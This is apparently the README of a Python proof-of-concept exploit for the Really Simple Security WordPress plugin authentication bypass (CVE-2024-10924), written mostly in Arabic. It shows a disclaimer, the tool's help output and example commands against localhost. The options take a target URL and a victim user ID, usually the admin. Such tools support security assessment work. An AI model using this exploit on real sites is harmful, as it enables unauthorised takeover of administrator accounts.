
يستغل ثغرة تجاوز المصادقة في Really Simple Security < 9.1.2 (CVE-2024-10924).
هذا برنامج Python3 يستغل ثغرة تجاوز المصادقة في Really Simple Security < 9.1.2 (CVE-2024-10924).
هذه الأداة مخصصة لمهندسي الأمن ومتخصصي أمن التطبيقات (appsec) لإجراء تقييمات أمنية. يرجى استخدام هذه الأداة بمسؤولية. لا أتحمل مسؤولية الطريقة التي يستخدم بها أي شخص هذا التطبيق. لست مسؤولًا عن أي أضرار ناتجة أو أي جرائم تُرتكب باستخدام هذه الأداة.
$ ./exploit.py --help
usage: exploit.py [-h] -t TARGET [-uid USER_ID] [-v]
Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - v1.0 (2024-11-19)
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URL of the target WordPress
-uid USER_ID, --user-id USER_ID
Victim user ID (1 is usually the admin).
-v, --verbose verbose mode
./exploit.py -t http://localhost:1337
./exploit.py -t http://localhost:1337 -uid 1 -v
يمكن إعداد تطبيق قابل للاستغلال باستخدام هذا المستودع.
انظر إلى ملف LICENSE للحصول على التفاصيل.